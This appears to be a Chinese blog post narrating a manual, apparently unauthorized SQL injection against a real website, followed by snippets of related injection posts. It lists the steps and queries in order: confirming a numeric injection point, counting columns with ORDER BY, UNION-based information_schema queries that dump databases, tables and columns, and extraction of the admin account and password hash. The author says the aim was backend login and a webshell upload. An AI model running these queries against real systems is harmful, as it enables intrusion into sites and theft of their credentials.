一次簡單sql注入
id** 遇見id= 上去乙個單引號 報錯,
回顯判斷是mysql資料庫 and 1=1正常 and 1=2 不正常
數字型注入點沒錯了,還沒有waf 開始下手
order by 判斷當前注入點有25個字段 回顯 2 和 10
用database()替換2 version()替換10 開始爆當前資料庫和版本
得到當前資料庫跟版本,替換查詢語句開始查詢所有資料庫 查詢到只有兩個庫
select group_concat(schema_name) from information_schema.schemata
開始爆當前資料庫所有表名
select group_concat(table_name) from information_schema.tables where table_schema='庫名'
注意:庫名跟表名都需要16進製制加密
一眼望過去只有user表入我的法眼 開始爆user表裡所有字段
select group_concat(column_name) from information_schema.columns where table_name='表名'
開始爆欄位內容
select group_concat(column_name) from information_schema.columns where table_name=表名
這裡精簡為:select group_concat(字段) from user
賬戶admin出來了 開始爆密碼(替換name欄位就行)
這裡的admin和這段加密的密碼很有可能是後台的賬戶
在此之前已經通過掃瞄器找到了他的後台
但是這段雜湊值是密碼為程式設計師自定義的雜湊加密,
破解非常非常麻煩(需撞庫)所以到此就結束了
如果這裡密碼能解密應該就能直接登入後台進行下一步滲透 上傳拿webshell等
一次sql注入攻擊
喜歡學習 但是不想找漏洞 好麻煩 還不一定有乙個漏洞 是我在google上搜到的 畫面看著高大上 乙個頁面乙個頁面的找,尋找有輸入引數的地方,然後進行測試 本來我以為沒有注入的時候 突然 看到了一小句話 wow 有報錯資訊 可以進行報錯注入 想著可以提交烏雲了 然後先 order by 測試下有幾個...
一次簡單手工注入
注入點http news.php?newsid 18 收集了下ip,不能sqlmap了,就只能手工了。經典 and 1 1 1 2 一直報錯,感覺是被過濾了,後面使用注釋符也不行 使用union select 1,2,3也報錯,確定不了字段數。成功payload union select 1,2,c...
記一次sql二次注入
簡單的說,二次注入是指已儲存 資料庫 檔案 的使用者輸入被讀取後再次進入到 sql 查詢語句中導致的注入。相比於直接注入,二次注入是比較有趣的。因為他會把你第一次的請求儲存,然後在第二次使用到的時候,才會啟用並且返回結果。例如在某個插入功能中,我們插入構造的sql語句,此時並沒有什麼現象,但是當瀏覽...